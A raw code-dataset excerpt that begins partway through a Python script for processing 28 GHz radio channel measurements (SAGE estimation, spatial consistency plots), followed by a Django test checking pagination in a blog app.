num2_sum, den_sum = np.sum(num1), np.sum(num2), np.sum(den)\r\n\r\n return np.sqrt((num1_sum / den_sum) - np.square(num2_sum / den_sum))\r\n\"\"\"\r\n\r\n\"\"\"\r\n# RMS AoA direction spread computation (std | no-units [normalized])\r\n# See Visualizations-II: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5956639]\r\ndef rms_aoa_direction_spread(mpcs: List[MPCParameters]) -> float:\r\n e_vecs, p_vec, mu_vec = [], [], []\r\n\r\n for _l_mpc in range(len(mpcs)):\r\n mpc = mpcs[_l_mpc]\r\n p = mpc.profile_point_power\r\n phi, theta = mpc.aoa_azimuth, mpc.aoa_elevation\r\n e_vecs.append(np.array([np.cos(phi) * np.sin(theta), np.sin(phi) * np.sin(theta), np.cos(theta)]))\r\n mu_vec.append(p * e_vecs[_l_mpc])\r\n p_vec.append(p)\r\n\r\n mu_omega = np.sum(mu_vec, axis=0)\r\n\r\n return np.sqrt(np.sum([np.square(np.linalg.norm(e_vecs[_l_mpc] -\r\n mu_omega)) * p_vec[_l_mpc] for _l_mpc in range(len(mpcs))]))\r\n\"\"\"\r\n\r\n\r\n# Spatial autocorrelation coefficient computation\r\n# See [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7996408]\r\n# Increasing Tx-Rx distance, Tx-Rx alignment accuracy, and Tx-Rx relative velocity | corr: prev | corr_: curr\r\ndef s_coeff(pdp: PDPSegment, pdp_: PDPSegment) -> float:\r\n n, n_ = pdp.num_samples, pdp_.num_samples\r\n samps, samps_ = pdp.processed_rx_samples, pdp_.processed_rx_samples\r\n\r\n s, s_ = np.abs(np.fft.fft(samps)) / n, np.abs(np.fft.fft(samps_)) / n_\r\n a, a_ = np.mean(s), np.mean(s_)\r\n ln = min(n, n_)\r\n\r\n s_mod, s_mod_ = (s - a)[:ln], (s_ - a_)[:ln]\r\n num = np.mean(s_mod * s_mod_)\r\n den = np.sqrt(np.mean(np.square(s_mod)) * np.mean(np.square(s_mod_)))\r\n\r\n return np.clip(num / den, -1.0, 1.0) if den != 0.0 else np.nan\r\n\r\n\r\n\"\"\"\r\n# Empirical Cumulative Distribution Function (variant-I)\r\ndef ecdf(x: np.array) -> Tuple:\r\n x_, cts = np.unique(x, return_counts=True)\r\n\r\n cum_sum = np.cumsum(cts)\r\n return x_, cum_sum / cum_sum[-1]\r\n\"\"\"\r\n\r\n\"\"\"\r\n# SAGE Algorithm: MPC parameters computation\r\n# See: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=753729]\r\n# Also see: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6901837]\r\ndef estimate_mpc_parameters(tx: GPSEvent, rx: GPSEvent, n: int, x: np.array) -> List:\r\n f_c, _f_c = tx_fc, rx_fc\r\n f_s, n_std = sample_rate, n_sigma\r\n v_0, l_, k_ = pn_v0, pn_l, pn_reps\r\n\r\n y_f = np.fft.fft(x) / n\r\n fs = np.argsort(np.fft.fftfreq(n, (1 / f_s)))\r\n n_f = (n_std * np.random.randn(fs.shape[0], )).view(np.csingle)\r\n\r\n # Previous parameter estimates ...$[i-1]$\r\n nus = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n phis = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n taus = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n thetas = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n alphas = np.zeros(shape=(max_mpcs,), dtype=np.csingle)\r\n\r\n '''\r\n TODO: Bring in an object-oriented programming methodology here wherein we have a configurable set of MPCParameters, \r\n possibly defined by enumerations, and each enum member has a class definition with its relevant routines such \r\n as convergence_check, getters/setters, L1/L2 norms, etc. This allows for easy encapsulation across the script.\r\n '''\r\n\r\n # Flip components in the rectangular chips of the PN-sequence $u(f)$\r\n def flip(a: int) -> int:\r\n assert a == 1 or a == -1\r\n return 1 if a == -1 else -1\r\n\r\n # Sinc function\r\n def sinc(z: float) -> float:\r\n return np.sin(pi * z) / (pi * z)\r\n\r\n # Baseband signal component post-convolution in the frequency domain $p(f; \\tau_{l}, \\nu_{l})$\r\n def signal_component(tau_l: float, nu_l: float) -> Tuple:\r\n f_shifts = []\r\n sig_sum = complex(0.0, 0.0)\r\n for k in range(k_):\r\n for _k in range(k_):\r\n f_shift = (((f_c * k) + (_f_c * _k)) / l_) + nu_l\r\n c_theta = -((2.0 * pi * f_c * (k / l_) * tau_l) + (pi * ((k + _k) / l_)))\r\n\r\n pn_sum = complex(0.0, 0.0)\r\n for i_l in range(l_):\r\n a_i = 1\r\n for _i_l in range(l_):\r\n _a_i = 1\r\n _c_theta = -(pi * (((k * i_l) + (_k * _i_l)) / l_))\r\n pn_sum += ((2 * a_i) - 1) * ((2 * _a_i) - 1) * complex(np.cos(_c_theta), np.sin(_c_theta))\r\n flip(_a_i)\r\n flip(a_i)\r\n\r\n f_shifts.append(f_shift)\r\n sig_sum += pn_sum * sinc(k / l_) * sinc(_k / l_) * complex(np.cos(c_theta), np.sin(c_theta))\r\n\r\n return f_shifts, np.square(v_0 / l_) * sig_sum\r\n\r\n # Complex gaussian noise component post-convolution in the frequency domain $n'(f)$\r\n def noise_component() -> Tuple:\r\n f_shifts = []\r\n n_sum = complex(0.0, 0.0)\r\n f_idxs = [_ for _ in range(fs.shape[0])]\r\n for k in range(k_):\r\n for _k in range(k_):\r\n f_shift = ((f_c * k) + (_f_c * _k)) / l_\r\n idx_f = min(f_idxs, key=lambda idx: abs(f_shift - fs[idx]))\r\n\r\n pn_sum = complex(0.0, 0.0)\r\n for i_l in range(l_):\r\n a_i = 1\r\n pn_sum += ((2 * a_i) - 1) * complex(np.cos(-pi * ((_k * i) / l_)), np.sin(-pi * ((_k * i) / l_)))\r\n flip(a_i)\r\n\r\n f_shifts.append(f_shift)\r\n n_sum += pn_sum * n_f[idx_f] * sinc(k / l_) * complex(np.cos(-pi * (_k / l_)), np.sin(-pi * (_k / l_)))\r\n\r\n return f_shifts, (v_0 / l_) * n_sum\r\n\r\n # See [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=753729]\r\n # Computing the steering vector [Angle-of-Arrival (AoA | azimuth & elevation)] at the Rx within SAGE\r\n def compute_steering(phi_l: float, theta_l: float) -> complex:\r\n az0, el0 = deg2rad(phi_l), deg2rad(theta_l)\r\n tx_lat, tx_lon, tx_alt = latitude(tx), longitude(tx), altitude(tx)\r\n rx_lat, rx_lon, rx_alt = latitude(rx), longitude(rx), altitude(rx)\r\n\r\n tx_e, tx_n = lla_utm_proj(tx_lon, tx_lat)\r\n rx_e, rx_n = lla_utm_proj(rx_lon, rx_lat)\r\n\r\n x0, y0, z0, x_, y_, z_ = rx_n, -rx_e, rx_alt, tx_n, -tx_e, tx_alt\r\n\r\n r1, az1, el1 = cart2sph(x_ - x0, y_ - y0, z_ - z0)\r\n\r\n r21, r22, r23 = 0.0, 1.0, 0.0\r\n r11, r12, r13 = sph2cart(0.0, 1.0, -el0)\r\n r31, r32, r33 = sph2cart(0.0, 1.0, -el0 + (pi / 2.0))\r\n\r\n x1, y1, z1 = sph2cart(r1, az1 - az0, el1)\r\n f_arr = np.matmul(np.array([x1, y1, z1]), np.array([[r11, r12, r13], [r21, r22, r23], [r31, r32, r33]]))\r\n\r\n az, el = rad2deg(f_arr[0]), rad2deg(f_arr[2])\r\n xs, ys, zs = sph2cart(1.0, deg2rad(az), deg2rad(el))\r\n az_amps_db, el_amps_db = decibel_1(az_amps), decibel_1(el_amps)\r\n azs0 = np.mod(rad2deg(np.arctan2(np.sign(ys) * np.sqrt(1 - np.square(xs)), xs)), 360.0)\r\n els0 = np.mod(rad2deg(np.arctan2(np.sign(zs) * np.sqrt(1 - np.square(xs)), xs)), 360.0)\r\n\r\n az_amps_norm_db = az_amps_db - max(az_amps_db) + max_ant_gain\r\n el_amps_norm_db = el_amps_db - max(el_amps_db) + max_ant_gain\r\n az_amps_norm = np.array([linear_1(db) for db in az_amps_norm_db])\r\n el_amps_norm = np.array([linear_1(db) for db in el_amps_norm_db])\r\n\r\n az_amps0 = interp1d(az_angles, az_amps_norm)(azs0)\r\n el_amps0 = interp1d(el_angles, el_amps_norm)(els0)\r\n\r\n ld, pos_vec = wlength, np.array([xs, ys, zs])\r\n f_aoa = ((az_amps0 * abs(ys)) + (el_amps0 * abs(zs))) / (abs(ys) + abs(zs))\r\n e_vec = np.array([np.cos(phi_l) * np.sin(theta_l), np.sin(phi_l) * np.sin(theta_l), np.cos(theta_l)])\r\n\r\n c_theta = 2.0 * pi * (1 / ld) * np.dot(e_vec, pos_vec)\r\n return f_aoa * complex(np.cos(c_theta), np.sin(c_theta))\r\n\r\n # Find the profile point power associated with the MPCParameters index (linear)\r\n def profile_point_power(l_idx: int) -> float:\r\n steering_l = compute_steering(phis_[l_idx], thetas_[l_idx])\r\n tau_l, nu_l, alpha_l = taus_[l_idx], nus_[l_idx], alphas_[l_idx]\r\n return np.square(np.abs(alpha_l * steering_l * signal_component(tau_l, nu_l)[1]))\r\n\r\n # Expectation of the log-likelihood component: Use $[i-1]$ estimates, i.e., phis, thetas, alphas, taus, nus\r\n def estep(l_idx: int, yf_s: np.array) -> np.array:\r\n return yf_s - np.sum(np.array([compute_steering(phis[_l_mpc], thetas[_l_mpc]) *\r\n alphas[_l_mpc] * signal_component(taus[_l_mpc], nus[_l_mpc])[1]\r\n for _l_mpc in range(max_mpcs) if _l_mpc != l_idx], dtype=np.csingle))\r\n\r\n # Maximization step for the MPC delay & Doppler shift $\\argmax_{\\tau,\\nu}\\{\\eta_(\\tau,\\nu)\\} (s, Hz)\r\n def tau_nu_mstep(l_idx: int) -> Tuple:\r\n tau_var, nu_var = cp.Variable(value=0.0), cp.Variable(value=0.0)\r\n\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_var.value, nu_var.value)[1]\r\n sig_comps = np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n\r\n numerator = cp.square(cp.abs(sig_comps.conj().T @ w_matrix @ estep_comps))\r\n denominator = cp.abs(sig_comps.conj().T @ w_matrix @ sig_comps)\r\n objective = numerator / denominator\r\n\r\n # noinspection PyTypeChecker\r\n problem = cp.Problem(objective=objective,\r\n constraints=[tau_min <= tau_var <= tau_max, nu_min <= nu_var <= nu_max])\r\n problem.solve(solver=solver, max_iters=max_iters, eps_abs=eps_abs, eps_rel=eps_rel, verbose=verbose)\r\n\r\n return tau_var.value, nu_var.value\r\n\r\n # Maximization step for the MPC complex attenuation (linear [complex])\r\n def alpha_mstep(l_idx: int, tau_l: float, nu_l: float, phi_l: float, theta_l: float) -> complex:\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_l, nu_l)[1]\r\n steering_comp = compute_steering(phi_l, theta_l)\r\n sig_comps = steering_comp * np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n\r\n numerator = functools.reduce(np.matmul, [sig_comps.conj().T, w_matrix, estep_comps])\r\n denominator = functools.reduce(np.matmul, [sig_comps.conj().T, w_matrix, sig_comps])\r\n\r\n return numerator / denominator\r\n\r\n # Maximization step for the MPC AoA azimuth and AoA elevation (rad, rad)\r\n def phi_theta_mstep(l_idx: int, tau_l: float, nu_l: float, alpha_l: complex) -> Tuple:\r\n phi_var, theta_var = cp.Variable(value=0.0), cp.Variable(value=0.0)\r\n\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_l, nu_l)[1]\r\n steering_comp = compute_steering(phi_var.value, theta_var.value)\r\n\r\n sig_comps = steering_comp * alpha_l * np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n numerator = cp.square(cp.abs(sig_comps.conj().T @ w_matrix @ estep_comps))\r\n denominator = cp.abs(sig_comps.conj().T @ w_matrix @ sig_comps)\r\n objective = numerator / denominator\r\n\r\n # noinspection PyTypeChecker\r\n problem = cp.Problem(objective=objective,\r\n constraints=[phi_min <= phi_var <= phi_max, the_min <= theta_var <= the_max])\r\n problem.solve(solver=solver, max_iters=max_iters, eps_abs=eps_abs, eps_rel=eps_rel, verbose=verbose)\r\n\r\n return phi_var.value, theta_var.value\r\n\r\n # Convergence check\r\n def is_converged(l_idx) -> bool:\r\n check = lambda param, param_, tol: np.abs(param - param_) > tol\r\n tau_tol, nu_tol, alpha_tol, phi_tol, theta_tol = delay_tol, doppler_tol, att_tol, aoa_az_tol, aoa_el_tol\r\n\r\n if first_iter or \\\r\n check(nus[l_idx], nus_[l_idx], nu_tol) or \\\r\n check(taus[l_idx], taus_[l_idx], tau_tol) or \\\r\n check(alphas[l_idx], alphas_[l_idx], alpha_tol) or \\\r\n check(phis[l_idx], phis_[l_idx], phi_tol) or check(thetas[l_idx], thetas_[l_idx], theta_tol):\r\n return False\r\n\r\n return True\r\n\r\n # Current parameter estimates ...$[i]$\r\n nus_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n phis_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n taus_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n thetas_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n alphas_ = np.zeros(shape=(max_mpcs,), dtype=np.csingle)\r\n nu_, tau_, phi_, theta_, alpha_ = nus_[0], taus_[0], phis_[0], thetas_[0], alphas_[0]\r\n w_matrix = np.linalg.inv(np.diag(np.full(fs.shape[0], np.mean(np.square(np.abs(noise_component()[1]))))))\r\n\r\n # SAGE wrapper\r\n for l_mpc in range(max_mpcs):\r\n first_iter = True\r\n\r\n while not is_converged(l_mpc):\r\n first_iter = False\r\n\r\n nus[l_mpc] = nu_\r\n taus[l_mpc] = tau_\r\n phis[l_mpc] = phi_\r\n thetas[l_mpc] = theta_\r\n alphas[l_mpc] = alpha_\r\n\r\n tau_, nu_ = tau_nu_mstep(l_mpc)\r\n taus_[l_mpc] = tau_\r\n nus_[l_mpc] = nu_\r\n\r\n phi_, theta_ = phi_theta_mstep(l_mpc, tau_, nu_, alphas[l_mpc])\r\n thetas_[l_mpc] = theta_\r\n phis_[l_mpc] = phi_\r\n\r\n alpha_ = alpha_mstep(l_mpc, tau_, nu_, phi_, theta_)\r\n alphas_[l_mpc] = alpha_\r\n\r\n return [MPCParameters(path_number=l_mpc, delay=taus_[l_mpc],\r\n doppler_shift=nus_[l_mpc], attenuation=alphas_[l_mpc],\r\n aoa_azimuth=phis_[l_mpc], aoa_elevation=thetas_[l_mpc],\r\n profile_point_power=profile_point_power(l_mpc)) for l_mpc in range(max_mpcs)]\r\n\"\"\"\r\n\r\n\"\"\"\r\nCORE OPERATIONS: Parsing the GPS, IMU, and PDP logs | SAGE estimation | Spatial consistency analyses\r\n\"\"\"\r\n\r\n# Antenna patterns\r\nlog = scipy.io.loadmat(ant_log_file)\r\naz_log, el_log = log['pat28GAzNorm'], log['pat28GElNorm']\r\naz_angles, az_amps = np.squeeze(az_log['azs'][0][0]), np.squeeze(az_log['amps'][0][0])\r\nel_angles, el_amps = np.squeeze(el_log['els'][0][0]), np.squeeze(el_log['amps'][0][0])\r\n\r\n# Extract Rx gps_events (Tx fixed on rooftop | V2I)\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(len(os.listdir(rx_gps_dir))):\r\n filename = 'gps_event_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(rx_gps_events, GPSEvent, ''.join([rx_gps_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract Tx imu_traces\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(0, len(os.listdir(tx_imu_dir)), tx_imu_skip_step):\r\n filename = 'imu_trace_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(tx_imu_traces, IMUTrace, ''.join([tx_imu_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract Rx imu_traces\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(len(os.listdir(rx_imu_dir))):\r\n filename = 'imu_trace_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(rx_imu_traces, IMUTrace, ''.join([rx_imu_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract timestamp_0 (start_timestamp)\r\nwith open(''.join([comm_dir, start_timestamp_file])) as file:\r\n elements = file.readline().split()\r\n timestamp_0 = datetime.datetime.strptime(''.join([elements[2], ' ', elements[3]]), datetime_format)\r\n\r\n''' Evaluate parsed_metadata | Extract power-delay profile samples '''\r\n\r\nsegment_done, pdp_samples_file = False, ''.join([comm_dir, pdp_samples_file])\r\ntimestamp_ref = datetime.datetime.strptime(rx_gps_events[0].timestamp, datetime_format)\r\n\r\nwith open(''.join([comm_dir, parsed_metadata_file])) as file:\r\n for line_num, line in enumerate(file):\r\n if line_num % 18 == 0:\r\n seq_number = int(re.search(r'\\d+', line)[0])\r\n elif (line_num - 3) % 18 == 0:\r\n # noinspection RegExpAnonymousGroup\r\n timestamp = timestamp_0 + datetime.timedelta(seconds=float(re.search(r'[+-]?\\d+(\\.\\d+)?', line)[0]))\r\n elif (line_num - 11) % 18 == 0 and timestamp >= timestamp_ref:\r\n num_samples = int(re.search(r'\\d+', line)[0])\r\n segment_done = True\r\n else:\r\n pass\r\n\r\n if segment_done:\r\n segment_done = False\r\n raw_rx_samples = np.fromfile(pdp_samples_file,\r\n offset=seq_number * num_samples, count=num_samples, dtype=np.csingle)\r\n\r\n if len(raw_rx_samples) == 0 or \\\r\n np.isnan(raw_rx_samples).any() or np.abs(np.min(raw_rx_samples)) > min_threshold:\r\n continue\r\n\r\n num_samples, processed_rx_samples = process_rx_samples(raw_rx_samples)\r\n\r\n pdp_segments.append(PDPSegment(num_samples=num_samples,\r\n seq_number=seq_number + 1, timestamp=str(timestamp),\r\n correlation_peak=correlation_peak(processed_rx_samples),\r\n raw_rx_samples=raw_rx_samples, processed_rx_samples=processed_rx_samples))\r\n\r\n''' Match gps_event, imu_trace, and pdp_segment timestamps across both the Tx and the Rx realms '''\r\n\r\nfor seqnum in range(1, len(rx_gps_events)):\r\n rx_gps_event = rx_gps_events[seqnum]\r\n seq_number, timestamp = rx_gps_event.seq_number, rx_gps_event.timestamp\r\n\r\n pdp_segment = min(pdp_segments, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n tx_imu_trace = min(tx_imu_traces, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n rx_imu_trace = min(rx_imu_traces, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n\r\n # mpc_parameters = estimate_mpc_parameters(tx_gps_event, rx_gps_event,\r\n # pdp_segment.num_samples, pdp_segment.processed_rx_samples)\r\n\r\n # pods.append(Pod(seq_number=seq_number, timestamp=timestamp,\r\n # tx_gps_event=tx_gps_event, tx_imu_trace=IMUTrace(),\r\n # rx_gps_event=rx_gps_event, rx_imu_trace=IMUTrace(),\r\n # rms_aoa_dir_spread=rms_aoa_direction_spread(mpc_parameters),\r\n # tx_rx_distance_2d=tx_rx_distance_2d(tx_gps_event, rx_gps_event),\r\n # tx_elevation=elevation(tx_gps_event), rx_elevation=elevation(rx_gps_event),\r\n # mpc_parameters=mpc_parameters, rms_delay_spread=rms_delay_spread(mpc_parameters),\r\n # tx_rx_alignment=tx_rx_alignment(tx_gps_event, rx_gps_event, IMUTrace(), IMUTrace()),\r\n # pdp_segment=pdp_segment, tx_rx_distance_3d=tx_rx_distance_3d(tx_gps_event, rx_gps_event)))\r\n\r\n pods.append(Pod(seq_number=seq_number, timestamp=timestamp,\r\n tx_gps_event=tx_gps_event, tx_imu_trace=IMUTrace(),\r\n rx_gps_event=rx_gps_event, rx_imu_trace=IMUTrace(),\r\n tx_rx_distance_2d=tx_rx_distance_2d(tx_gps_event, rx_gps_event),\r\n tx_elevation=elevation(tx_gps_event), rx_elevation=elevation(rx_gps_event),\r\n tx_rx_alignment=tx_rx_alignment(tx_gps_event, rx_gps_event, IMUTrace(), IMUTrace()),\r\n pdp_segment=pdp_segment, tx_rx_distance_3d=tx_rx_distance_3d(tx_gps_event, rx_gps_event)))\r\n\r\n\"\"\"\r\nCORE VISUALIZATIONS I: Spatial decoherence analyses\r\n\"\"\"\r\n\r\nidxs = [_i for _i in range(len(pods))]\r\npod = max(pods, key=lambda _pod: _pod.pdp_segment.correlation_peak)\r\n\r\nfor dn in np.arange(start=0.0, stop=d_max, step=d_step):\r\n '''\r\n # With Tx-Rx alignment more or less the same, compute s_coeff w.r.t \"pod\" for the pod with the dist closest to \"dn\"\r\n i_ = min(idxs, key=lambda idx: abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment) +\r\n abs(dn - distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(dn - distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n distns.append((dn, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nfor an in np.arange(start=0.0, stop=a_max, step=a_step):\r\n '''\r\n # With Tx-Rx distance more or less the same, compute s_coeff w.r.t \"pod\" for the pod with alignment closest to \"an\"\r\n i_ = min(idxs, key=lambda idx: abs(distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)) +\r\n abs(an - abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(an - abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment)))\r\n alignments.append((an, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nfor vn in np.arange(start=0.0, stop=v_max, step=v_step):\r\n '''\r\n # With Tx-Rx dist and align more or less the same, compute s_coeff w.r.t \"pod\" for the pod with vel closest to \"vn\"\r\n i_ = min(idxs, key=lambda idx: abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment) +\r\n abs(distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)) +\r\n abs(vn - tx_rx_relative_velocity(pod.tx_gps_event, pods[idx].tx_gps_event,\r\n pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(vn - tx_rx_relative_velocity(pod.tx_gps_event,\r\n pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n velocities.append((vn, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nscd_layout = dict(xaxis=dict(title='Tx-Rx Distance (in m)'),\r\n title='Spatial Consistency Analysis vis-à-vis Distance',\r\n yaxis=dict(title='Spatial Autocorrelation Coefficient'))\r\nscd_trace = go.Scatter(x=[distn[0] for distn in distns], mode='lines+markers',\r\n y=signal.savgol_filter([distn[1] for distn in distns], sg_wsize, sg_poly_order))\r\n\r\nscv_layout = dict(xaxis=dict(title='Tx-Rx Relative Velocity (in m/s)'),\r\n title='Spatial Consistency Analysis vis-à-vis Velocity',\r\n yaxis=dict(title='Spatial Autocorrelation Coefficient'))\r\nscv_trace = go.Scatter(x=[vel[0] for vel in velocities], mode='lines+markers',\r\n y=signal.savgol_filter([veloc[1] for veloc in velocities], sg_wsize, sg_poly_order))\r\n\r\nsca_layout = dict(xaxis=dict(title='Tx-Rx Relative Alignment Accuracy (in deg)'),\r\n yaxis=dict(title='Spatial (Angular) Autocorrelation Coefficient'),\r\n title='Spatial (Angular) Consistency Analysis vis-à-vis Alignment')\r\nsca_trace = go.Scatter(x=[alignment[0] for alignment in alignments], mode='lines+markers',\r\n y=signal.savgol_filter([alignment[1] for alignment in alignments], sg_wsize, sg_poly_order))\r\n\r\nscd_url = plotly.plotly.plot(dict(data=[scd_trace], layout=scd_layout), filename=sc_distance_png)\r\nscv_url = plotly.plotly.plot(dict(data=[scv_trace], layout=scv_layout), filename=sc_velocity_png)\r\nsca_url = plotly.plotly.plot(dict(data=[sca_trace], layout=sca_layout), filename=sc_alignment_png)\r\n\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Distance: {}.'.format(scd_url))\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Velocity: {}.'.format(scv_url))\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Alignment: {}.'.format(sca_url))\r\n\r\n\"\"\"\r\nCORE VISUALIZATIONS II: RMS delay spread and RMS direction spread\r\n\"\"\"\r\n\r\n# rms_aoa_dir_spreads = np.array([pod.rms_aoa_dir_spread for pod in pods])\r\n# rms_delay_spreads = np.array([pod.rms_delay_spread / 1e-9 for pod in pods])\r\n\r\n# rms_delay_spread_x, rms_delay_spread_ecdf = ecdf(rms_delay_spreads)\r\n# rms_aoa_dir_spread_x, rms_aoa_dir_spread_ecdf = ecdf(rms_aoa_dir_spreads)\r\n\r\n# rms_ds_layout = dict(yaxis=dict(title='CDF Probability'),\r\n# xaxis=dict(title='RMS Delay Spreads (x) in ns'),\r\n# title='RMS Delay Spread Cumulative Distribution Function')\r\n# rms_aoa_dirs_layout = dict(yaxis=dict(title='CDF Probability'),\r\n# xaxis=dict(title='RMS AoA Direction Spreads (x) in deg'),\r\n# title='RMS AoA Direction Spread Cumulative Distribution Function')\r\n\r\n# rms_ds_trace = go.Scatter(x=rms_delay_spread_x, y=rms_delay_spread_ecdf, mode='lines+markers')\r\n# rms_aoa_dirs_trace = go.Scatter(x=rms_aoa_dir_spread_x, y=rms_aoa_dir_spread_ecdf, mode='lines+markers')\r\n\r\n# rms_aoa_dirs_url = plotly.plotly.plot(dict(data=[rms_aoa_dirs_trace],\r\n# layout=rms_aoa_dirs_layout), filename=aoa_rms_dir_spread_png)\r\n# rms_ds_url = plotly.plotly.plot(dict(data=[rms_ds_trace], layout=rms_ds_layout), filename=rms_delay_spread_png)\r\n\r\n# print('SPAVE-28G | Consolidated Processing II | RMS Delay Spread CDF: {}.'.format(rms_ds_url))\r\n# print('SPAVE-28G | Consolidated Processing II | RMS AoA Direction Spread CDF: {}.'.format(rms_aoa_dirs_url))\r\n","repo_name":"bharathkeshavamurthy/SPAVE-28G","sub_path":"src/analyses/ConsolidatedPostProcessorII.py","file_name":"ConsolidatedPostProcessorII.py","file_ext":"py","file_size_in_byte":50177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"2709751895","text":"from django.contrib.auth import get_user_model\r\nfrom django.test import Client, TestCase\r\nfrom django.urls import reverse\r\n\r\nfrom ..models import Group, Post\r\n\r\nFIRST_PAGE_POSTS_COUNT: int = 10\r\nSECOND_PAGE_POSTS_COUNT: int = 3\r\n\r\nUser = get_user_model()\r\n\r\n\r\nclass PaginatorTest(TestCase):\r\n @classmethod\r\n def setUpClass(cls):\r\n super().setUpClass()\r\n cls.user = User.objects.create_user(username='auth')\r\n cls.group = Group.objects.create(\r\n title='Тестовая группа',\r\n slug='test_slug',\r\n description='Тестовое описание',\r\n )\r\n cls.posts = [Post(\r\n author=cls.user,\r\n text='Тестовый пост',\r\n group=cls.group,\r\n ) for _ in range(FIRST_PAGE_POSTS_COUNT + SECOND_PAGE_POSTS_COUNT)]\r\n Post.objects.bulk_create(cls.posts)\r\n\r\n def setUp(self):\r\n self.auth_client = Client()\r\n self.auth_client.force_login(self.user)\r\n self.non_auth_client = Client()\r\n\r\n def test_posts_count_on_first_page(self):\r\n urls = [\r\n reverse('posts:index'),\r\n reverse(\r\n 'posts:group_list',\r\n kwargs={'slug': self.group.slug},\r\n ),\r\n reverse(\r\n 'posts:profile',\r\n kwargs={'username': self.user.username},\r\n ),\r\n ]\r\n for url in urls:\r\n with self.subTest():\r\n response = self.auth_client.get(url)\r\n self.assertEqual(\r\n len(response.context['page_obj']),\r\n FIRST_PAGE_POSTS_COUNT,\r\n )\r\n\r\n def test_posts_count_on_second_page(self):\r\n urls = [\r\n reverse('posts:index'),\r\n reverse(\r\n 'posts:group_list',\r\n kwargs={'slug': self.group.slug},\r\n ),\r\n reverse(\r\n 'posts:profile',\r\n kwargs={'username': self.user.username},\r\n ),\r\n ]\r\n for url in urls:\r\n with self.subTest():\r\n response = self.auth_client.get(url + '?page=2')\r\n self.assertEqual(\r\n len(response.context['page_obj']),\r\n SECOND_PAGE_POSTS_COUNT,\r\n )\r\n","repo_name":"Nasibao/yatube-final","sub_path":"yatube/posts/tests/test_paginator.py","file_name":"test_paginator.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} 